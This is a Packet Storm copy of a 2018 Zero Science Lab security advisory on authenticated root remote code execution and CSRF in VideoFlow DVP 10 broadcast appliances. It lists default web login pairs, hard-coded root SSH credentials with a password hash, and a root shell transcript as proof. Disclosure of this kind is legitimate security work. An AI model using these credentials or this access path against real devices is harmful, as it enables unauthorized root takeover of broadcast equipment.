what you don't know can hurt you

VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution

VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
Posted Mar 31, 2018
Authored by LiquidWorm | Site zeroscience.mk

VideoFlow Digital Video Protection DVP 10 version 2.10 suffers from authenticated remote code execution vulnerability. Including a cross site request forgery vulnerability, a remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

tags | exploit, remote, arbitrary, root, code execution, csrf
MD5 | 96e1a3c362090e4832e802711f4bbb2a

VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution

Change Mirror Download

VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution

Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)

System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version

System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i

System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08

System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07


Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.

Desc: The affected device suffers from authenticated remote code execution
vulnerability. Including a CSRF, a remote attacker can exploit this issue
and execute arbitrary system commands granting her system access with root
privileges.

Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5455
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php

01.02.2018

---


Default credentials (web management):

admin:admin
oper:oper
private:private
public:public
devel:devel


Hard-Coded credentials (ssh):

root:videoflow
mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./


-------------------------------- > Tools > System > Shell > --------------------------------
| |
| sh-3.2# id;pwd;uname -a;ls |
| uid=0(root) gid=0(root) |
| /dvp100/confd |
| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
| 86 i686 i386 GNU/Linux |
| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
| sh-3.2# cat /etc/issue |
| CentOS release 5.10 (Final) |
| Kernel \r on an \m |
| |
--------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close